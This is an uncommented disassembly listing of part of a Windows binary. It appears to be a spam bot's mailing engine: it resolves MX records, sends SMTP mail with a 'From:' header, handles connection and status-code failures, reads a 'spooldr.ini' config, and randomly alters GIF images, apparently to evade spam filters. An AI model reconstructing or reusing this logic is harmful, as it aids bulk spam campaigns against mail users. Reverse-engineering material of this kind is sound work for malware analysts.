mov ecx, ebx
call sub_401D5D
mov edi, eax
test edi, edi
jnz short loc_4024A5
mov edi, ds:dword_4180D8
lea eax, [esi+50ACh]
push eax
call DeleteCriticalSection ; df--HS
push dword ptr [esi+50A0h]
call CloseHandle
lea ecx, [esi+5088h]
call sub_401F70
lea eax, [esi+5068h]
push eax
call DeleteCriticalSection ; df--HS
lea eax, [esi+3Ch]
push eax
call DeleteCriticalSection ; df--HS
lea ecx, [esi+14h]
call sub_40951B
lea ecx, [esi+0Ch]
call sub_40DB59
lea ecx, [esi+8]
call sub_40DB59
pop edi
pop esi
pop ebx
leave
retn
sub_402400 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402512 proc near ; CODE XREF: sub_402512+2D7 p
; sub_402624+33B p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
push 0Ch
mov ebx, ecx
call sub_40D0BB
test eax, eax
pop ecx
jz short loc_402531
mov ecx, eax
call sub_401AF9
mov esi, eax
jmp short loc_402533
; ---------------------------------------------------------------------------
loc_402531: ; CODE XREF: loc_402531+12 j
xor esi, esi
loc_402533: ; CODE XREF: loc_402533+1D j
mov eax, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov [esi], eax
cmp byte ptr [ebx+10h], 0
jz short loc_40254E
test eax, eax
jnz short loc_402570
push eax
push dword ptr [edi+4]
lea ecx, [esi+4]
jmp short loc_40256B
; ---------------------------------------------------------------------------
loc_40254E: ; CODE XREF: loc_40254E+2D j
push 0
push dword ptr [edi+4]
lea ecx, [esi+4]
call sub_40DB5E
cmp [ebp+arg_4], 0
jz short loc_402570
mov eax, [ebp+arg_8]
push 0
push dword ptr [eax]
lea ecx, [esi+8]
loc_40256B: ; CODE XREF: loc_40256B+3A j
call sub_40DB5E
loc_402570: ; CODE XREF: loc_402570+31 j
; sub_402512+4D j
lea eax, [ebx+5068h]
push eax
mov [ebp+arg_0], eax
call EnterCriticalSection
push dword ptr [edi]
lea ecx, [ebx+5064h]
call sub_401F3E
test eax, eax
mov [ebp+arg_4], eax
jnz short loc_4025BF
push 8
call sub_40D0BB
pop ecx
xor ecx, ecx
cmp eax, ecx
jz short loc_4025AC
mov [eax], ecx
mov [eax+4], ecx
mov [ebp+arg_4], eax
jmp short loc_4025AF
; ---------------------------------------------------------------------------
loc_4025AC: ; CODE XREF: loc_4025AC+8E j
mov [ebp+arg_4], ecx
loc_4025AF: ; CODE XREF: loc_4025AF+98 j
push [ebp+arg_4]
lea ecx, [ebx+5064h]
push dword ptr [edi]
call sub_408F07
loc_4025BF: ; CODE XREF: loc_4025BF+80 j
mov ecx, [ebp+arg_4]
call sub_409570
mov [eax], esi
mov eax, [esi+4]
test eax, eax
jnz short loc_4025D5
and [ebp+arg_4], eax
jmp short loc_4025DF
; ---------------------------------------------------------------------------
loc_4025D5: ; CODE XREF: loc_4025D5+BC j
push eax
call sub_40CD83
pop ecx
mov [ebp+arg_4], eax
loc_4025DF: ; CODE XREF: loc_4025DF+C1 j
mov esi, [esi+8]
test esi, esi
jnz short loc_4025EA
xor eax, eax
jmp short loc_4025F1
; ---------------------------------------------------------------------------
loc_4025EA: ; CODE XREF: loc_4025EA+D2 j
push esi
call sub_40CD83
pop ecx
loc_4025F1: ; CODE XREF: loc_4025F1+D6 j
mov ecx, [ebp+arg_4]
lea eax, [eax+ecx+4]
push eax
add ebx, 5080h
push ebx
call InterlockedExchangeAdd
push [ebp+arg_0]
call LeaveCriticalSection
mov ecx, edi
call sub_401AE5
push edi
call sub_40D0B6
pop ecx
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_402512 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402624 proc near ; CODE XREF: .text:00402AAE p
var_11C4 = byte ptr -11C4h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11C4h
call sub_4011B0
push ebx
push esi
push edi
mov edi, ecx
lea ecx, [ebp+var_10]
call sub_40DB48
lea ecx, [ebp+var_1C]
call sub_40DB48
lea ecx, [ebp+var_20]
call sub_40DB48
lea ecx, [ebp+var_8]
call sub_40DB48
lea ecx, [ebp+var_14]
call sub_40DB48
push 1194h
lea eax, [ebp+var_11C4]
push 0
push eax
call sub_40CCD9
mov ebx, [ebp+arg_0]
add esp, 0Ch
push dword ptr [ebx]
lea ecx, [edi+38h]
call sub_401F3E
mov esi, eax
test esi, esi
mov [ebp+var_24], esi
jnz short loc_40269D
mov ecx, ebx
call sub_401AE5
push ebx
call sub_40D0B6
pop ecx
jmp loc_402918
; ---------------------------------------------------------------------------
loc_40269D: ; CODE XREF: loc_40269D+64 j
push 0
push dword ptr [esi+4]
lea ecx, [ebp+var_10]
call sub_40DB5E
push offset asc_418268 ; ";"
lea ecx, [ebx+4]
call sub_40DD00
and [ebp+var_C], 0
mov ebx, eax
mov eax, [ebx+4]
test eax, eax
mov [ebp+var_18], eax
jbe short loc_4026FD
lea eax, [ebp+var_11C4]
mov [ebp+var_4], eax
mov esi, 12Ch
loc_4026D5: ; CODE XREF: loc_4026D5+D4 j
mov eax, [ebp+var_C]
cmp eax, 0Fh
jge short loc_4026FA
mov ecx, [ebx]
push esi
push dword ptr [ecx+eax*4]
push [ebp+var_4]
call lstrcpynA
inc [ebp+var_C]
mov eax, [ebp+var_C]
add [ebp+var_4], esi
cmp eax, [ebp+var_18]
jb short loc_4026D5
loc_4026FA: ; CODE XREF: loc_4026FA+B7 j
mov esi, [ebp+var_24]
loc_4026FD: ; CODE XREF: loc_4026FD+A1 j
mov ecx, ebx
call sub_401F85
push ebx
call sub_40D0B6
mov esi, [esi+8]
test esi, esi
pop ecx
jz loc_4027C8
mov ecx, esi
call sub_402E80
mov esi, eax
push 0
mov [ebp+var_18], esi
call sub_40CFAE
push eax
call sub_40CF2A
mov eax, [esi+20h]
mov ebx, [esi+24h]
pop ecx
pop ecx
mov [ebp+var_24], eax
call sub_40CF34
push 14h
cdq
pop ecx
idiv ecx
add edx, ebx
push edx
call sub_40CF34
push 14h
pop ecx
cdq
idiv ecx
mov ecx, esi
add edx, [ebp+var_24]
push edx
call sub_402EBB
mov ecx, esi
call sub_402DEC
test al, al
jz short loc_4027C0
mov ebx, [esi+1Ch]
mov esi, [esi+4]
push 0
push ebx
call sub_40C2F0
pop ecx
pop ecx
lea ecx, [ebp+var_C]
mov [ebp+var_4], eax
call sub_40DB48
push [ebp+var_4]
lea ecx, [ebp+var_C]
call sub_40DADA
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_C]
push ebx
push esi
call sub_40C344
add esp, 14h
push offset asc_418214 ; "^%"
push offset aT ; "%^T"
lea eax, [ebp+var_C]
push eax
lea ecx, [ebp+var_10]
call sub_40DC4B
lea ecx, [ebp+var_C]
call sub_40DB59
loc_4027C0: ; CODE XREF: loc_4027C0+143 j
lea ecx, [ebp+var_18]
call sub_401D97
loc_4027C8: ; CODE XREF: loc_4027C8+EC j
mov ebx, [ebp+arg_0]
mov eax, [ebx+8]
test eax, eax
mov esi, offset aFrom ; "From: "
jz short loc_4027F1
push eax
call sub_40CD83
test eax, eax
pop ecx
jbe short loc_4027F1
push dword ptr [ebx+8]
lea eax, [ebp+var_10]
push esi
push eax
mov ecx, edi
call sub_401B9A
loc_4027F1: ; CODE XREF: loc_4027F1+1B1 j
; sub_402624+1BC j
lea eax, [edi+14h]
push eax
push dword ptr [edi+8]
lea ecx, [ebp+var_30]
push dword ptr [edi+0Ch]
call sub_4070A6
lea eax, [ebp+var_11C4]
push eax
lea eax, [ebp+var_10]
push eax
lea ecx, [ebp+var_30]
call sub_407F86
push esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
mov ecx, edi
call sub_401B3F
test al, al
jz short loc_402875
xor esi, esi
cmp [ebp+var_8], esi
jnz short loc_402835
xor eax, eax
jmp short loc_40283E
; ---------------------------------------------------------------------------
loc_402835: ; CODE XREF: loc_402835+20B j
push [ebp+var_8]
call sub_40CD83
pop ecx
loc_40283E: ; CODE XREF: loc_40283E+20F j
mov ecx, [ebp+var_8]
cmp byte ptr [eax+ecx-1], 40h
jnz short loc_402853
push dword ptr [edi+8]
lea ecx, [ebp+var_8]
call sub_401AA0
loc_402853: ; CODE XREF: loc_402853+222 j
push esi
lea eax, [ebp+var_11C4]
push eax
lea ecx, [ebp+var_14]
call sub_40DB5E
push esi
push offset a@ ; "@"
lea ecx, [ebp+var_14]
call sub_40DB2F
cmp eax, esi
jnz short loc_402888
loc_402875: ; CODE XREF: loc_402875+204 j
mov ecx, ebx
call sub_401AE5
push ebx
call sub_40D0B6
pop ecx
jmp loc_402908
; ---------------------------------------------------------------------------
loc_402888: ; CODE XREF: loc_402888+24F j
push esi
inc eax
push eax
lea ecx, [ebp+var_1C]
call sub_40DB5E
xor ebx, ebx
loc_402895: ; CODE XREF: loc_402895+2BD j
lea eax, [ebp+var_20]
push eax
test ebx, ebx
setnz al
push eax
push [ebp+var_1C]
call sub_40C574
add esp, 0Ch
test al, al
jz loc_402947
push [ebp+var_20]
call sub_40C627
pop ecx
push 1Eh
push 19h
push eax
lea ecx, [edi+4]
call sub_4012B3
mov esi, eax
test esi, esi
mov [ebp+var_4], esi
jnz loc_402969
lea ecx, [ebp+var_4]
call sub_4021A1
inc ebx
cmp ebx, 3
jl short loc_402895
push offset aTcpConnectionI ; "TCP connection is failed"
lea ecx, [ebp+var_18]
call sub_40DCEB
lea eax, [ebp+var_18]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
mov ecx, edi
call sub_402512
lea ecx, [ebp+var_18]
loc_402903: ; CODE XREF: loc_402903+343 j
call sub_40DB59
loc_402908: ; CODE XREF: loc_402908+25F j
; sub_402624+411 j
lea ecx, [ebp+var_2C]
call sub_40DB59
lea ecx, [ebp+var_30]
call sub_40DB59
loc_402918: ; CODE XREF: loc_402918+74 j
lea ecx, [ebp+var_14]
call sub_40DB59
lea ecx, [ebp+var_8]
call sub_40DB59
lea ecx, [ebp+var_20]
call sub_40DB59
lea ecx, [ebp+var_1C]
call sub_40DB59
lea ecx, [ebp+var_10]
call sub_40DB59
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_402947: ; CODE XREF: loc_402947+288 j
push offset aCanTGetMx ; "Can't get mx"
lea ecx, [ebp+var_4]
call sub_40DCEB
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFEh
push [ebp+arg_0]
mov ecx, edi
call sub_402512
lea ecx, [ebp+var_4]
jmp short loc_402903
; ---------------------------------------------------------------------------
loc_402969: ; CODE XREF: loc_402969+2AB j
push [ebp+var_10]
mov ecx, esi
push [ebp+var_14]
push [ebp+var_8]
push dword ptr [edi+8]
call sub_40D5DD
test al, al
mov ecx, [esi+0Ch]
mov ebx, [esi+8]
mov [ebp+var_C], ecx
jnz loc_402A5C
lea eax, [edi+50ACh]
push eax
call EnterCriticalSection
cmp ebx, [edi+50A4h]
jnz short loc_4029CE
lea eax, [edi+50A8h]
inc dword ptr [eax]
cmp dword ptr [eax], 1Eh
jbe short loc_4029E5
push 1
push 1B7740h
push dword ptr [edi+50A0h]
call WaitForSingleObjectEx
test eax, eax
jz short loc_4029E5
mov eax, [edi]
mov ecx, edi
call dword ptr [eax]
jmp short loc_4029E5
; ---------------------------------------------------------------------------
loc_4029CE: ; CODE XREF: loc_4029CE+37C j
cmp ebx, 0FFFFFFFEh
mov eax, ebx
jnz short loc_4029D8
or eax, 0FFFFFFFFh
loc_4029D8: ; CODE XREF: loc_4029D8+3AF j
and dword ptr [edi+50A8h], 0
mov [edi+50A4h], eax
loc_4029E5: ; CODE XREF: loc_4029E5+389 j
; sub_402624+3A0 j ...
lea eax, [edi+50ACh]
push eax
call LeaveCriticalSection
lea eax, [ebx-190h]
cmp eax, 63h
ja short loc_402A3A
mov ebx, [ebp+arg_0]
add ebx, 8
mov eax, [ebx]
test eax, eax
jz short loc_402A14
push eax
call sub_40CD83
test eax, eax
pop ecx
jnz short loc_402A1F
loc_402A14: ; CODE XREF: loc_402A14+3E3 j
lea eax, [ebp+var_8]
push eax
mov ecx, ebx
call sub_40DC39
loc_402A1F: ; CODE XREF: loc_402A1F+3EE j
push [ebp+arg_0]
mov ecx, edi
call sub_401E66
test al, al
jz short loc_402A5C
loc_402A2D: ; CODE XREF: loc_402A2D+45C j
lea ecx, [ebp+var_4]
call sub_4021A1
jmp loc_402908
; ---------------------------------------------------------------------------
loc_402A3A: ; CODE XREF: loc_402A3A+3D7 j
cmp ebx, 22Ah
jnz short loc_402A5C
push offset aYahoo_com ; "yahoo.com"
push [ebp+var_1C]
call sub_40CD44
test eax, eax
pop ecx
pop ecx
jnz short loc_402A5C
mov [ebp+var_C], 4
loc_402A5C: ; CODE XREF: loc_402A5C+363 j
; sub_402624+407 j ...
push dword ptr [esi+4]
lea ecx, [ebp+var_18]
call sub_40DCEB
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
mov ecx, edi
push [ebp+arg_0]
call sub_402512
lea ecx, [ebp+var_18]
call sub_40DB59
jmp short loc_402A2D
sub_402624 endp
; ---------------------------------------------------------------------------
loc_402A82: ; DATA XREF: loc_402A82+2A o
push esi
push edi
mov edi, ds:dword_4180B0
push 1
mov esi, ecx
push 1
push dword ptr [esi+50A0h]
call WaitForSingleObjectEx ; df--HS
test eax, eax
jz short loc_402ACE
push ebx
lea ebx, [esi+54h]
loc_402AA0: ; CODE XREF: .text:00402ACB j
mov ecx, ebx
call sub_401CA6
test eax, eax
jz short loc_402AB5
push eax
mov ecx, esi
call sub_402624
jmp short loc_402ABD
; ---------------------------------------------------------------------------
loc_402AB5: ; CODE XREF: .text:00402AA9 j
push 64h
call Sleep
loc_402ABD: ; CODE XREF: .text:00402AB3 j
push 1
push 1
push dword ptr [esi+50A0h]
call edi
test eax, eax
jnz short loc_402AA0
pop ebx
loc_402ACE: ; CODE XREF: .text:00402A9A j
pop edi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_402AD3 proc near ; CODE XREF: sub_402AD3+164 p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push edi
push [esp+8+arg_0]
lea edi, [esi+5088h]
mov ecx, edi
call sub_402172
xor ecx, ecx
cmp [esi+508Ch], ecx
jbe short loc_402B12
xor edx, edx
loc_402AF4: ; CODE XREF: loc_402AF4+3D j
mov eax, [edi]
add eax, edx
and dword ptr [eax+4], 0
inc ecx
mov dword ptr [eax+0Ch], offset loc_402A82
mov [eax+8], esi
add edx, 10h
cmp ecx, [esi+508Ch]
jb short loc_402AF4
loc_402B12: ; CODE XREF: loc_402B12+1D j
pop edi
pop esi
retn 4
sub_402AD3 endp
; =============== S U B R O U T I N E =======================================
sub_402B17 proc near ; CODE XREF: sub_402B17+22 p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push dword ptr [eax+8]
mov esi, ecx
push dword ptr [eax]
call sub_41430E
pop ecx
pop ecx
mov [esi+0Ch], eax
pop esi
retn 4
sub_402B17 endp
; =============== S U B R O U T I N E =======================================
sub_402B31 proc near ; DATA XREF: sub_402B31+20 o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, [eax+34h]
cmp dword ptr [esi+18h], 0
jbe short loc_402B5D
push edi
mov edi, [esp+8+arg_8]
push edi
push dword ptr [esi]
push [esp+10h+arg_4]
call sub_40CCF7
add [esi], edi
add esp, 0Ch
sub [esi+18h], edi
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_402B5D: ; CODE XREF: loc_402B5D+C j
xor eax, eax
pop esi
retn
sub_402B31 endp
; =============== S U B R O U T I N E =======================================
sub_402B61 proc near ; DATA XREF: sub_402B61+13 o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, [eax+34h]
mov eax, [esi+4]
test eax, eax
push edi
mov edi, [esp+8+arg_8]
jz short loc_402B83
mov ecx, [esi+1Ch]
add ecx, edi
push ecx
push eax
call sub_40CA55
jmp short loc_402B8B
; ---------------------------------------------------------------------------
loc_402B83: ; CODE XREF: loc_402B83+12 j
push 1
push edi
call sub_40CA2C
loc_402B8B: ; CODE XREF: loc_402B8B+20 j
pop ecx
pop ecx
mov [esi+4], eax
mov eax, [esi+1Ch]
add eax, [esi+4]
push edi
push [esp+0Ch+arg_4]
push eax
call sub_40CCF7
add [esi+1Ch], edi
add esp, 0Ch
mov eax, edi
pop edi
pop esi
retn
sub_402B61 endp
; =============== S U B R O U T I N E =======================================
sub_402BAC proc near ; CODE XREF: sub_402BAC+A5 p
; sub_402E80+12 p
push esi
mov esi, ecx
push edi
xor edi, edi
lea ecx, [esi+8]
mov [ecx], edi
push edi
mov [esi+20h], edi
mov [esi+24h], edi
mov [esi+28h], edi
call sub_408034
mov [esi+18h], edi
mov [esi+0Ch], edi
mov [esi+10h], edi
mov [esi+14h], edi
mov [esi+4], edi
mov [esi+1Ch], edi
pop edi
mov eax, esi
pop esi
retn
sub_402BAC endp
; =============== S U B R O U T I N E =======================================
sub_402BDD proc near ; CODE XREF: sub_402BDD+C p
; sub_401DFE+D p ...
push esi
mov esi, ecx
mov eax, [esi+0Ch]
test eax, eax
jz short loc_402BEE
push eax
call sub_414373
pop ecx
loc_402BEE: ; CODE XREF: loc_402BEE+8 j
mov eax, [esi+4]
test eax, eax
jz short loc_402BFC
push eax
call sub_40CCC5
pop ecx
loc_402BFC: ; CODE XREF: loc_402BFC+16 j
lea ecx, [esi+8]
pop esi
jmp sub_4093F0
sub_402BDD endp
; =============== S U B R O U T I N E =======================================
sub_402C05 proc near ; CODE XREF: sub_402C05+B p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
push ebx
mov esi, ecx
call sub_40D0BB
pop ecx
lea edi, [esi+8]
push eax
mov ecx, edi
call sub_408034
push ebx
push [esp+10h+arg_0]
push dword ptr [edi]
call sub_40CCF7
add esp, 0Ch
pop edi
mov [esi+28h], ebx
pop esi
pop ebx
retn 8
sub_402C05 endp
; =============== S U B R O U T I N E =======================================
sub_402C38 proc near ; CODE XREF: sub_402C38+12 p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push [esp+4+arg_4]
mov esi, ecx
push [esp+8+arg_0]
call sub_402C05
mov eax, [esp+4+arg_8]
mov [esi+20h], eax
mov eax, [esp+4+arg_C]
mov [esi+24h], eax
pop esi
retn 10h
sub_402C38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C5A proc near ; CODE XREF: sub_402C5A+31 p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
push [ebp+arg_C]
mov esi, ecx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402C38
mov eax, [ebp+arg_10]
push [ebp+arg_14]
mov ecx, esi
mov [esi+14h], eax
call sub_402B17
pop esi
pop ebp
retn 18h
sub_402C5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C86 proc near ; CODE XREF: sub_402C86+B9 p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, ecx
push edi
lea edi, [esi+8]
xor bl, bl
cmp dword ptr [edi], 0
jnz loc_402DE3
mov eax, [ebp+arg_4]
mov [esi+18h], eax
mov eax, [ebp+arg_0]
push offset sub_402B31
push esi
mov [esi], eax
call sub_413720
test eax, eax
pop ecx
pop ecx
mov [esi+10h], eax
jz loc_402DDE
and [ebp+arg_0], 0
mov ecx, [eax+0Ch]
mov [esi+14h], ecx
lea ecx, [ebp+arg_0]
push ecx
inc bl
push eax
jmp loc_402DCD
; ---------------------------------------------------------------------------
loc_402CD6: ; CODE XREF: loc_402CD6+150 j
mov eax, [ebp+arg_0]
cmp eax, 2
jnz short loc_402D40
push dword ptr [esi+10h]
call sub_41344D
test eax, eax
pop ecx
jz loc_402DA1
mov eax, [esi+10h]
mov ecx, [eax+20h]
mov [esi+20h], ecx
mov ecx, [eax+24h]
mov eax, [esi+20h]
imul eax, ecx
push eax
mov [esi+24h], ecx
mov [esi+28h], eax
call sub_40D0BB
pop ecx
push eax
mov ecx, edi
call sub_408034
push dword ptr [esi+28h]
push dword ptr [edi]
push dword ptr [esi+10h]
call sub_4139FE
add esp, 0Ch
test eax, eax
jnz loc_402DC6
push eax
mov ecx, edi
call sub_408034
call sub_414233
jmp loc_402DC6
; ---------------------------------------------------------------------------
loc_402D40: ; CODE XREF: loc_402D40+56 j
cmp eax, 4
jz short loc_402D7B
cmp eax, 1
jnz short loc_402D59
push dword ptr [esi+10h]
call sub_413334
test eax, eax
pop ecx
jz short loc_402DA1
jmp short loc_402DC6
; ---------------------------------------------------------------------------
loc_402D59: ; CODE XREF: loc_402D59+C2 j
cmp eax, 3
jnz short loc_402DC6
and [ebp+arg_4], 0
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_4]
push eax
push dword ptr [esi+10h]
call sub_413631
add esp, 0Ch
test eax, eax
jnz short loc_402DBC
xor bl, bl
loc_402D7B: ; CODE XREF: loc_402D7B+BD j
test bl, bl
jz short loc_402DE3
mov eax, [esi+10h]
mov eax, [eax+10h]
push dword ptr [eax+8]
push dword ptr [eax]
call sub_41430E
push dword ptr [esi+10h]
mov [esi+0Ch], eax
call sub_41312A
add esp, 0Ch
test eax, eax
jnz short loc_402DE3
loc_402DA1: ; CODE XREF: loc_402DA1+63 j
; sub_402C86+CF j ...
call sub_414233
xor bl, bl
jmp short loc_402DE3
; ---------------------------------------------------------------------------
loc_402DAA: ; CODE XREF: loc_402DAA+13A j
lea eax, [ebp+arg_4]
push eax
push dword ptr [esi+10h]
call sub_4130C4
test eax, eax
pop ecx
pop ecx
jz short loc_402DC4
loc_402DBC: ; CODE XREF: loc_402DBC+F1 j
cmp [ebp+arg_4], 0
jnz short loc_402DAA
jmp short loc_402DC6
; ---------------------------------------------------------------------------
loc_402DC4: ; CODE XREF: loc_402DC4+134 j
xor bl, bl
loc_402DC6: ; CODE XREF: loc_402DC6+A2 j
; sub_402C86+B5 j ...
lea eax, [ebp+arg_0]
push eax
push dword ptr [esi+10h]
loc_402DCD: ; CODE XREF: loc_402DCD+4B j
call sub_41304B
test eax, eax
pop ecx
pop ecx
jnz loc_402CD6
jmp short loc_402DA1
; ---------------------------------------------------------------------------
loc_402DDE: ; CODE XREF: loc_402DDE+34 j
call sub_414233
loc_402DE3: ; CODE XREF: loc_402DE3+11 j
; sub_402C86+F7 j ...
pop edi
pop esi
mov al, bl
pop ebx
leave
retn 8
sub_402C86 endp
; =============== S U B R O U T I N E =======================================
sub_402DEC proc near ; CODE XREF: sub_402DEC+13C p
var_C = dword ptr -0Ch
push ebx
push esi
mov esi, ecx
xor ebx, ebx
push offset a89a ; "89a"
mov [esi+1Ch], ebx
call sub_413B0A
mov [esp+0Ch+var_C], offset sub_402B61
push esi
call sub_413A73
cmp eax, ebx
pop ecx
pop ecx
mov [esi+10h], eax
jnz short loc_402E1E
loc_402E15: ; CODE XREF: loc_402E15+50 j
; sub_402DEC+6B j ...
call sub_414233
xor al, al
jmp short loc_402E7D
; ---------------------------------------------------------------------------
loc_402E1E: ; CODE XREF: loc_402E1E+27 j
mov ecx, [esi+0Ch]
mov edx, [esi+24h]
push edi
mov edi, [esi+20h]
push ecx
push dword ptr [esi+14h]
push dword ptr [ecx]
push edx
push edi
push eax
call sub_413C3B
add esp, 18h
test eax, eax
pop edi
jz short loc_402E15
mov eax, [esi+24h]
mov ecx, [esi+20h]
push ebx
push ebx
push eax
push ecx
push ebx
push ebx
push dword ptr [esi+10h]
call sub_41403A
add esp, 1Ch
test eax, eax
jz short loc_402E15
push dword ptr [esi+28h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_4141CB
add esp, 0Ch
test eax, eax
jz short loc_402E15
push dword ptr [esi+10h]
call sub_413B1E
test eax, eax
pop ecx
jz short loc_402E15
mov al, 1
loc_402E7D: ; CODE XREF: loc_402E7D+30 j
pop esi
pop ebx
retn
sub_402DEC endp
; =============== S U B R O U T I N E =======================================
sub_402E80 proc near ; CODE XREF: sub_402E80+F4 p
push esi
push edi
push 2Ch
mov esi, ecx
call sub_40D0BB
test eax, eax
pop ecx
jz short loc_402E9B
mov ecx, eax
call sub_402BAC
mov edi, eax
jmp short loc_402E9D
; ---------------------------------------------------------------------------
loc_402E9B: ; CODE XREF: loc_402E9B+E j
xor edi, edi
loc_402E9D: ; CODE XREF: loc_402E9D+19 j
push dword ptr [esi+0Ch]
mov ecx, edi
push dword ptr [esi+14h]
push dword ptr [esi+24h]
push dword ptr [esi+20h]
push dword ptr [esi+28h]
push dword ptr [esi+8]
call sub_402C5A
mov eax, edi
pop edi
pop esi
retn
sub_402E80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EBB proc near ; CODE XREF: sub_402EBB+135 p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
mov esi, ecx
push edi
lea eax, [esi+8]
xor edi, edi
cmp [eax], edi
mov [ebp+var_8], eax
jz loc_402FC5
mov eax, [ebp+arg_0]
cmp eax, [esi+20h]
jbe loc_402FC5
push ebx
mov ebx, [ebp+arg_4]
cmp ebx, [esi+24h]
jbe loc_402FC4
push edi
call sub_40CFAE
push eax
call sub_40CF2A
mov eax, [ebp+arg_0]
imul eax, ebx
push eax
mov [ebp+var_C], eax
call sub_40D0BB
add esp, 0Ch
xor ebx, ebx
cmp [esi+24h], edi
mov [ebp+var_4], eax
jbe short loc_402F66
mov eax, [esi+20h]
loc_402F19: ; CODE XREF: loc_402F19+A9 j
mov ecx, [ebp+var_8]
push eax
imul eax, ebx
add eax, [ecx]
push eax
mov eax, [ebp+var_4]
add eax, edi
push eax
call sub_40CCF7
mov eax, [esi+20h]
mov ecx, [ebp+arg_0]
sub ecx, eax
push ecx
lea ecx, [ebx+2]
imul ecx, eax
sub ecx, [ebp+arg_0]
add edi, eax
mov eax, [ebp+var_8]
add ecx, [eax]
mov eax, [ebp+var_4]
push ecx
add eax, edi
push eax
call sub_40CCF7
mov eax, [esi+20h]
mov ecx, [ebp+arg_0]
sub ecx, eax
add esp, 18h
add edi, ecx
inc ebx
cmp ebx, [esi+24h]
jb short loc_402F19
loc_402F66: ; CODE XREF: loc_402F66+59 j
mov eax, [esi+24h]
mov ebx, [ebp+arg_4]
dec eax
cmp eax, ebx
jnb short loc_402FA7
mov edi, eax
imul edi, [ebp+arg_0]
add edi, [ebp+var_4]
sub ebx, eax
loc_402F7C: ; CODE XREF: loc_402F7C+EA j
push [ebp+arg_0]
call sub_40CF34
cdq
push 0Ah
pop ecx
idiv ecx
mov eax, [esi+24h]
sub eax, edx
dec eax
imul eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
push edi
call sub_40CCF7
add edi, [ebp+arg_0]
add esp, 0Ch
dec ebx
jnz short loc_402F7C
loc_402FA7: ; CODE XREF: loc_402FA7+B4 j
mov eax, [ebp+arg_0]
push [ebp+var_4]
mov ecx, [ebp+var_8]
mov [esi+20h], eax
mov eax, [ebp+arg_4]
mov [esi+24h], eax
mov eax, [ebp+var_C]
mov [esi+28h], eax
call sub_408034
loc_402FC4: ; CODE XREF: loc_402FC4+2D j
pop ebx
loc_402FC5: ; CODE XREF: loc_402FC5+14 j
; sub_402EBB+20 j
pop edi
pop esi
leave
retn 8
sub_402EBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402FCB proc near ; CODE XREF: sub_402FCB+34 p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ecx
lea ecx, [ebp+var_4]
call sub_40DB48
push 105h
lea ecx, [ebp+var_4]
call sub_40DADA
push [ebp+var_4]
push 104h
call GetCurrentDirectoryA
push offset aSpooldr_ini ; "\\spooldr.ini"
lea ecx, [ebp+var_4]
call sub_401AA0
push 8
call sub_40D0BB
test eax, eax
pop ecx
jz short loc_403017
mov ecx, eax
call sub_40CC41
jmp short loc_403019
; ---------------------------------------------------------------------------
loc_403017: ; CODE XREF: loc_403017+41 j
xor eax, eax
loc_403019: ; CODE XREF: loc_403019+4A j
push dword_421078
mov [esi], eax
mov edx, [eax]
push 80000002h
mov ecx, eax
call dword ptr [edx]
push 0Ch
call sub_40D0BB
test eax, eax
pop ecx
jz short loc_403041
mov ecx, eax
call sub_40C9A6
jmp short loc_403043
; ---------------------------------------------------------------------------
loc_403041: ; CODE XREF: loc_403041+6B j
xor eax, eax
loc_403043: ; CODE XREF: loc_403043+74 j
push offset aConfig ; "config"
push [ebp+var_4]
mov [esi+4], eax
mov edx, [eax]
mov ecx, eax
call dword ptr [edx]
lea ecx, [ebp+var_4]
call sub_40DB59
mov eax, esi
pop esi
leave
retn
sub_402FCB endp
; =============== S U B R O U T I N E =======================================
